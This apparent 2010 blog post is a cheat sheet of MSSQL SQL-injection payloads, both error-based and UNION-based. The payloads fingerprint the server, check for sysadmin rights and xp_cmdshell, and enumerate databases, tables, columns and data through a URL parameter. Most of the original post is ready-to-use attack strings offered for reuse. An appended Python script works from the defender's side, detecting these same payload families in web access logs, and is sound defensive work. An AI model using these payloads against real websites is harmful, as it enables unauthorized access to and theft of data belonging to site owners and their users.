Title: MSSQL injection in error mode and non-error mode -- 2010-10-27 19:51
I have been doing a lot of manual injection lately, so here is a list of the MSSQL statements I have used most recently, for convenient reuse later.
------------------------------------------------------------------------------------------------------------------------------------
MSSQL comment symbols:
#
--

Error mode:
Determine whether stacked (multiple) statements are supported
;declare @x int--
View the current database version
url?id=13 and @@version>0--
View the currently connected database user
url?id=13 and user>0--
View the current database name
url?id=13 and db_name()>0--
Explode the database name
url?id=13 and 1=convert(int,(select name from master.dbo.sysdatabases where dbid=7))--
Entries with dbid<7 are the system database names.
Explode the table names of the current database
url?id=13 and 1=convert(int,(select top 1 name from sysobjects where xtype='U'))--
url?id=13 and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('table name 1','table name 2')))--
Explode the table names of other databases
url?id=13 and 1=convert(int,(select top 1 name from [database name]..sysobjects where xtype='u'))--
url?id=13 and 1=convert(int,(select top 1 name from [database name]..sysobjects where xtype='u' and name not in ('table name 1','table name 2')))--
Explode field names
url?id=13 having 1=1--
url?id=13 group by table name.field name 1, field name 2 having 1=1--
Explode the field names of other tables
url?id=13 select * from table name having 1=1--
url?id=13 select * from table name group by table name.field name 1, field name 2 having 1=1--
Expanded form:
url?id=13 and 1=convert(int,(select * from table name having 1=1))-- (the error reveals a field name)
url?id=13 and 1=convert(int,(select * from table name group by table name.field name having 1=1))-- (the error reveals the next field name)
Explode data
url?id=13 and 1=convert(int,(select top 1 field name from table name))--
url?id=13 and 1=convert(int,(select top 1 field name from table name where field name not in ('data 1','data 2')))--
url?id=13 and 1=convert(int,(select top 1 field name from table name where field name='data 1' and field name!='data 2'))--
A where clause can be used in the same way.

Non-error mode:
url?id=13 order by N  (N = number of fields)
url?id=13 and 1=2 union select ?,?,?,?,?--
Query the database version and system version
url?id=13 and 1=2 union select ?,?,?,@@version--
Query database user names
url?id=13 and 1=2 union select ?,?,?,(select user)--
url?id=13 and 1=2 union select ?,?,?,(select system_user)--
Query the host name
url?id=13 and 1=2 union select ?,?,?,(select host_name())--
Query the database name
url?id=13 and 1=2 union select ?,?,?,(select db_name())--
Determine whether the extended stored procedure xp_cmdshell exists
url?id=13 and 1=2 union select ?,?,?,(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')--
1 means it exists, 0 means it does not.
Determine the current database user's permissions
url?id=13 and 1=2 union select ?,?,?,(select is_srvrolemember('sysadmin'))--
Query database names
url?id=13 and 1=2 union select ?,?,?,(select name from master.dbo.sysdatabases where dbid=7)--
Entries with dbid<7 are the system database names.
Query database table names
url?id=13 and 1=2 union select ?,?,?,(select top 1 name from sysobjects where xtype='U')--
url?id=13 and 1=2 union select ?,?,?,(select top 1 name from sysobjects where xtype='U' and name not in ('table name 1','table name 2'))--
Query field names
url?id=13 and 1=2 union select ?,?,?,(select top 1 name from database name.dbo.syscolumns where id=object_id('table name'))--
url?id=13 and 1=2 union select ?,?,?,(select top 1 name from database name.dbo.syscolumns where id=object_id('table name') and name not in ('field name 1','field name 2'))--
Query data
url?id=13 and 1=2 union select ?,?,?,(select top 1 field name from table name)--
url?id=13 and 1=2 union select ?,?,?,(select top 1 field name from table name where field name not in ('data 1','data 2'))--

Other statements
Explode table names
url?id=13 and 1=2 union select ?,?,?,(select top 1 name from sysobjects where xtype='u' and name not in (select top 0 name from sysobjects where xtype='u')) from sysobjects--
Increment the N in the second "top N" from 0 upwards to walk through the table names of the current database.
Explode the table names of other databases
url?id=13 and 1=2 union select ?,?,?,(select top 1 name from [database name]..sysobjects where xtype='u' and name not in (select top 0 name from [database name]..sysobjects where xtype='u'))--
Explode field names
url?id=13 and 1=2 union select ?,?,?,(select top 1 name from syscolumns where id in (select id from sysobjects where name='table name') and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name='table name'))) from sysobjects--
Increment the N in the second "top N" from 0 upwards to walk through the field names of the admin table.
Query data
url?id=13 and 1=2 union select top 1 ?,?,field name from table name where name not in (select top 0 name from table name)--
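
As an added detection example from the defender's side (not part of the original post), the following Python script scans web-server access log lines for the payload families listed above: the stacked-query declare probe, error-based convert(int,...), having 1=1 column leaks, union select, the @@version / system_user / host_name() / db_name() fingerprints, sysobjects/syscolumns/sysdatabases enumeration, and the xp_cmdshell and is_srvrolemember checks. The regexes, the /news.asp path and the sample log lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit
# One regex per payload family from the cheat sheet above (constructed for this example).
SIGNATURES = [
    ("stacked-query probe", re.compile(r";\s*declare\s+@\w+")),
    ("error-based convert()", re.compile(r"\bconvert\s*\(\s*int\s*,")),
    ("having/group by column leak", re.compile(r"\bhaving\s+1\s*=\s*1\b")),
    ("union-based", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("fingerprint probe", re.compile(r"@@version|\bsystem_user\b|\bhost_name\s*\(|\bdb_name\s*\(")),
    ("catalog enumeration", re.compile(r"\bsys(?:objects|columns|databases)\b")),
    ("privilege/xp_cmdshell probe", re.compile(r"\bxp_cmdshell\b|\bis_srvrolemember\s*\(")),
]

# Combined-format access log line: client - - [time] "METHOD target proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def normalize(query):
    """Decode URL encoding twice (double encoding is a common evasion), drop inline comments, fold whitespace."""
    text = unquote_plus(unquote_plus(query))
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).lower()

def classify(query):
    """Return the labels of every signature family that matches one raw query string."""
    text = normalize(query)
    return [label for label, rx in SIGNATURES if rx.search(text)]

def scan_log(lines):
    """Return (client ip, HTTP status, labels) for each request matching at least one family."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        labels = classify(urlsplit(m.group("target")).query)
        if labels:
            hits.append((m.group("ip"), int(m.group("status")), labels))
    return hits

# Constructed sample log: one normal request followed by the probe sequence described above.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Oct/2010:19:51:00 +0800] "GET /news.asp?id=13 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [27/Oct/2010:19:51:07 +0800] "GET /news.asp?id=13%20and%20@@version>0-- HTTP/1.1" 500 312',
    '10.0.0.9 - - [27/Oct/2010:19:51:12 +0800] "GET /news.asp?id=13%20and%201=convert(int,(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27U%27))-- HTTP/1.1" 500 340',
    '10.0.0.9 - - [27/Oct/2010:19:52:30 +0800] "GET /news.asp?id=13%20and%201=2%20union%20select%20null,null,null,(select%20is_srvrolemember(%27sysadmin%27))-- HTTP/1.1" 200 4870',
]

if __name__ == "__main__":
    for ip, status, labels in scan_log(SAMPLE_LOG):
        print(ip, status, ", ".join(labels))
```

A run of 500 responses from one client followed by a 200 on a union payload is the pattern worth alerting on: the error-mode probes failed loudly and the non-error technique then succeeded.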